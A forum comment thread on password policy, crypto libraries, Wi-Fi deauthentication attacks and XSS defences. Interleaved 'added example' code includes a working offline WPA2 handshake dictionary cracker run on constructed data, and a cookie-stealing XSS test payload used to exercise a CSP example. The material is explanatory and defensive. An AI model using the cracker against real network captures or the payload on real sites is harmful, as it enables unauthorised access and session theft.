« First « Previous Comments 58 - 85 of 85 Search these comments
porkchopexpress says
This isn’t my deep area of expertise, but what implementation language are you using?
I live and breathe cybersecurity. It's my job.
@porkchopexpress
Ah - found you. Besides OpenSSL, what do you suggest for a crypto library? I'm looking for AES256 and ECC public/private keypairs. I'm playing with the NaCl library:
https://libsodium.gitbook.io/doc/?source=patrick.net
But I'm running into an issue with the public/private keypairs it generates for different things (Diffie–Hellman versus digital signatures, for example): I have to generate a completely new keypair rather than being able to reuse one. Got another library to suggest?
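For readers hitting the same wall: libsodium deliberately hands out separate keypairs for signing (Ed25519) and key exchange (X25519), but the two curves are birationally equivalent, and libsodium exposes crypto_sign_ed25519_sk_to_curve25519() and crypto_sign_ed25519_pk_to_curve25519() to derive an X25519 keypair from an Ed25519 one. The block below is an added example (not code from this thread, from Patrick, or from libsodium) that re-implements that mapping in pure Python so the relationship is visible: one 32-byte seed yields a signing public key, and both the secret-side and public-side conversions land on the same X25519 public key. Field arithmetic is schoolbook and not constant-time, so it is for understanding only; the test vectors are from RFC 8032 and RFC 7748, and the final seed check is a self-consistency check.

```python
"""One Ed25519 seed -> signing keypair and, via the Edwards/Montgomery map, an X25519 keypair.

Added example for the libsodium discussion; not libsodium code. Mirrors what
crypto_sign_ed25519_sk_to_curve25519 / crypto_sign_ed25519_pk_to_curve25519 compute.
Not constant-time: for illustration only.
"""
import hashlib

P = 2**255 - 19                                   # field prime shared by both curves
D = (-121665 * pow(121666, P - 2, P)) % P         # twisted Edwards constant d
SQRT_M1 = pow(2, (P - 1) // 4, P)                 # sqrt(-1) mod P, used when recovering x
A24 = 121665                                      # (A - 2) / 4 for Curve25519, A = 486662
X25519_BASE_U = (9).to_bytes(32, "little")        # Montgomery base point u = 9


def _inv(x):
    return pow(x % P, P - 2, P)


def _xrecover(y):
    """Even-x solution of the Ed25519 curve equation for a given y."""
    xx = (y * y - 1) * _inv(D * y * y + 1) % P
    x = pow(xx, (P + 3) // 8, P)
    if (x * x - xx) % P != 0:
        x = x * SQRT_M1 % P
    return P - x if x & 1 else x


BY = 4 * _inv(5) % P                              # base point y = 4/5
BASE_ED = (_xrecover(BY), BY)


def _ed_add(p, q):
    """Affine twisted-Edwards addition (a = -1)."""
    x1, y1 = p
    x2, y2 = q
    t = D * x1 * x2 * y1 * y2
    x3 = (x1 * y2 + x2 * y1) * _inv(1 + t)
    y3 = (y1 * y2 + x1 * x2) * _inv(1 - t)
    return x3 % P, y3 % P


def _ed_mul(pt, k):
    """Left-to-right double-and-add; (0, 1) is the neutral element."""
    acc = (0, 1)
    for bit in bin(k)[2:]:
        acc = _ed_add(acc, acc)
        if bit == "1":
            acc = _ed_add(acc, pt)
    return acc


def _clamp(b32):
    """RFC 8032 / RFC 7748 scalar clamping of a 32-byte little-endian scalar."""
    k = bytearray(b32)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return bytes(k)


def ed25519_public_key(seed):
    """Ed25519 public key: encode(a * B) with a = clamp(SHA-512(seed)[:32])."""
    a = int.from_bytes(_clamp(hashlib.sha512(seed).digest()[:32]), "little")
    x, y = _ed_mul(BASE_ED, a)
    return (y | ((x & 1) << 255)).to_bytes(32, "little")


def x25519(scalar, u):
    """RFC 7748 X25519 via the Montgomery ladder; returns the 32-byte u-coordinate."""
    k = int.from_bytes(_clamp(scalar), "little")
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * _inv(z2) % P).to_bytes(32, "little")


def ed25519_sk_to_x25519(seed):
    """X25519 secret from an Ed25519 seed: clamp(SHA-512(seed)[:32]), as libsodium does."""
    return _clamp(hashlib.sha512(seed).digest()[:32])


def ed25519_pk_to_x25519(pk):
    """X25519 public key from an Ed25519 public key: u = (1 + y) / (1 - y) mod P."""
    y = int.from_bytes(pk, "little") & ((1 << 255) - 1)
    u = (1 + y) * _inv(1 - y) % P
    return u.to_bytes(32, "little")


def derive_both(seed):
    """Signing public key plus the X25519 keypair derived from the same seed."""
    sign_pk = ed25519_public_key(seed)
    dh_sk = ed25519_sk_to_x25519(seed)
    return {
        "sign_pk": sign_pk,
        "dh_sk": dh_sk,
        "dh_pk_from_sk": x25519(dh_sk, X25519_BASE_U),   # what the DH side computes
        "dh_pk_from_pk": ed25519_pk_to_x25519(sign_pk),   # what a peer can compute from the signing key alone
    }
```

The two dh_pk values coincide, which is why a peer who only knows your Ed25519 signing key can still derive your X25519 key. Whether you should rely on that is a separate question: the default advice is one key per purpose, and the conversion is best reserved for designs where a single identity key has to cover both signing and key agreement.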
The worst is autogenerated passwords that you don't have easy access to change.
Agreed. Long passphrases for ones you have to remember, such as a vault or network password, but randomly generated, at least 16 (I do 20) characters, in a password manager for everything else, because you won’t have to remember them. If the target system uses a good hash algo, they’ll never get cracked.
bm9XjoK#3nMG0cV0
This was a real password I had to use at one time, which I always copied and pasted into the password box. I bet that's easier for a hacker to capture than figuring out the complex password.
My point is the more complex they make passwords, the lazier the user will be about having that impossible password handy, and the easier it will be for the baddies to retrieve it through the user's actions of storing it on a sticky note, or pasting the password from a file on their computer.
This isn’t my deep area of expertise, but what implementation language are you using?
Libgcrypt or crypto++ could be other options
I just did a light scan and nothing too concerning showed up.
@porkchopexpress If you have security advice for patrick.net, please let me know.
Please poke around and tell me if you can break in in any way.
That chart is useless and not true in most cases. Passwords are not hacked instantly or in a given time; it's tries!
Tenpoundbass says
That chart is useless and not true in most cases. Passwords are not hacked instantly or in a given time; it's tries!
Seems you've never heard of the re-authentication attack for wifi. I force all your devices off, then grab your WPA key when you log back in.
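What a forced-reconnect capture actually hands the attacker is the WPA2 4-way handshake, and the reason it matters for the "it's tries" argument is that every passphrase guess can then be checked offline, so no lockout counter is involved and the only brake is the cost of PBKDF2 per guess. The following is an added example (not code from anyone in this thread or from any Wi-Fi tool) that walks through the WPA2-PSK derivation chain: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK via PRF-512 with the "Pairwise key expansion" label, and the 16-byte HMAC-SHA1 key MIC from the handshake. All handshake material (MAC addresses, nonces, the EAPOL-Key bytes, the passphrase and the wordlist) is constructed inline so the script runs without a capture; a real attack reads those fields from the pcap.

```python
"""Offline dictionary attack against a (constructed) WPA2-PSK 4-way handshake.

Added example; not code from the thread. The handshake fields below are made
up so it runs stand-alone. The EAPOL frame is a placeholder with the layout of
a message 2 key body and the 16-byte MIC field zeroed, which is how the
attacker must present it to the MIC check.
"""
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 'Pairwise key expansion'; bytes 0..15 are the KCK that keys the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_mic_zeroed):
    """WPA2 (AKM 2) key MIC: HMAC-SHA1 over the EAPOL-Key frame with MIC zeroed, truncated to 16."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_mic_zeroed, target_mic, wordlist):
    """Return the first candidate whose derived MIC matches the captured one, else None.
    Each iteration costs one PBKDF2 (4096 HMACs) plus a handful of HMACs; nothing here
    talks to the access point, so its lockout policy never comes into play."""
    for guess in wordlist:
        kck = wpa2_ptk(wpa2_pmk(guess, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), target_mic):
            return guess
    return None


# --- constructed capture (stand-in for fields parsed out of a pcap) ---
SSID = "HomeNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 body: version/type/length, key info, key length, replay counter,
# then nonce, IV, RSC, ID, MIC (zeroed) and a zero data length. Lengths are illustrative.
EAPOL_MIC_ZEROED = (bytes.fromhex("0103007502010a0010") + bytes(8)   # header, key info, len, replay ctr
                    + SNONCE + bytes(16) + bytes(8) + bytes(8)        # SNonce, IV, RSC, ID
                    + bytes(16) + b"\x00\x00")                        # MIC field zeroed, data len 0


def make_capture(true_passphrase):
    """Station's side of the handshake: the MIC an attacker would see in the capture."""
    kck = wpa2_ptk(wpa2_pmk(true_passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MIC_ZEROED)


WORDLIST = ["password", "letmein", "homenet2019", "correct horse battery", "Tr0ub4dor&3"]

if __name__ == "__main__":
    captured_mic = make_capture("homenet2019")   # constructed: the network's real passphrase
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MIC_ZEROED, captured_mic, WORDLIST))
```

The ingredients that make a guess checkable are all in the clear in the handshake (both MACs, both nonces, the EAPOL frame and its MIC); only the PMK is secret, and it is a deterministic function of the passphrase and SSID. That is the whole reason a long, random passphrase is the defence here rather than an attempt counter.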
My point is the more complex they make passwords, the lazier the user will be about having that impossible password handy, and the easier it will be for the baddies to retrieve it through the user's actions of storing it on a sticky note, or pasting the password from a file on their computer.
That's why companies need to have password manager subscriptions. Make it stupid simple for the users to create and save complex passwords without having to ever write them down or memorize them.
What they will do is get a list of users, set up a bot farm, and run a dictionary against every user in the list.
How does that work when after three tries the account is locked out?
FWIW I am using the exact same password I created for my very first Windows 95 machine and used to sign up for AOL in 1996.
It has never been compromised.
I'm just pointing out that security is 99.999% not getting a phishing attack.
So true. Over 90% of successful cyber attacks involve some sort of social engineering (e.g., phishing) because it works.
HeadSet says
How does that work when after three tries the account is locked out?
Maybe not the best example, but the point is, the attack will be much broader than a single user, and weak password requirements mean fewer guesses before getting a match.
I don't even use a recognizable username on my machine, much less a common password, and "root" is disabled by default.
<script>code</script>
or
<a onclick="...code..."></a>
you can easily and robustly thwart most XSS vectors and sinks. CSP can potentially be very powerful against XSS if you don't mind writing your code in certain ways, such as putting all JS in .js files. CSP also lets you use inline script tags safely if you tag each one with a random per-page-load nonce, or with a checksum of the code contents.
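To make the nonce-and-hash part concrete, here is an added example (not code from this thread or from any framework) of the server side of such a policy in Python: a fresh nonce per response, a SHA-256 source expression computed over an inline script body, and a script-src that lists only 'self', that nonce and that hash, with no 'unsafe-inline'. The inline script text, the page template and the untrusted comment are constructed for the demo; wiring the returned header into a real response object is left to whatever web stack you use.

```python
"""Per-response CSP nonce plus hash-pinned inline script.

Added example, framework-agnostic. Assumptions: 16 random bytes of nonce,
SHA-256 for the hash, and a fixed inline script that is part of the build,
not of user content.
"""
import base64
import hashlib
import html
import secrets


def csp_nonce():
    """Fresh nonce for every response. A reused or guessable nonce is as good as
    'unsafe-inline', because injected markup can simply carry the same attribute."""
    return base64.b64encode(secrets.token_bytes(16)).decode()


def csp_script_hash(script_body):
    """'sha256-<base64>' source expression for one inline <script> body. The digest is
    over exactly the bytes between the tags, so any whitespace or template edit
    changes the value and the script stops running until the policy is updated."""
    digest = hashlib.sha256(script_body.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode()


def build_csp(nonce, inline_hashes=()):
    """script-src limited to same-origin files, <script nonce=...> tags carrying this
    response's nonce, and inline bodies whose hash is listed. Nothing matches an
    injected <script> or onclick="..." handler (event handler attributes cannot be
    nonced at all; move them to addEventListener in a .js file)."""
    sources = ["'self'", f"'nonce-{nonce}'"] + [f"'{h}'" for h in inline_hashes]
    return ("default-src 'self'; script-src " + " ".join(sources)
            + "; object-src 'none'; base-uri 'self'")


# Constructed: an inline snippet shipped with the app, hashed once and pinned.
FIXED_INLINE = "document.documentElement.dataset.csp='on';"


def render_page(user_comment):
    """Return (Content-Security-Policy header value, HTML body).
    user_comment is untrusted and HTML-escaped; the nonce is emitted only on the
    application's own tag, never anywhere user data is interpolated."""
    nonce = csp_nonce()
    header = build_csp(nonce, inline_hashes=[csp_script_hash(FIXED_INLINE)])
    body = (
        "<!doctype html><html><head>"
        f'<script nonce="{nonce}">window.__boot = true;</script>'   # allowed: nonce matches
        f"<script>{FIXED_INLINE}</script>"                            # allowed: hash listed
        "</head><body><p>"
        + html.escape(user_comment)                                   # injected markup becomes text
        + "</p></body></html>"
    )
    return header, body


if __name__ == "__main__":
    hdr, page = render_page('<script>alert(document.cookie)</script>')
    print("Content-Security-Policy:", hdr)
    print(page)
```

Two practical checks before relying on this: serve the policy as a header rather than a meta tag where you can, and run it in Content-Security-Policy-Report-Only first so that legitimate inline scripts you forgot to nonce or hash show up as reports instead of broken pages.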
It's true, you can make a very strong password with just lowercase. But that's not the point - the policy is used because SOME users will create weak passwords if the system lets them.
And if anyone's interested I use Keepass, none of that cloud shit.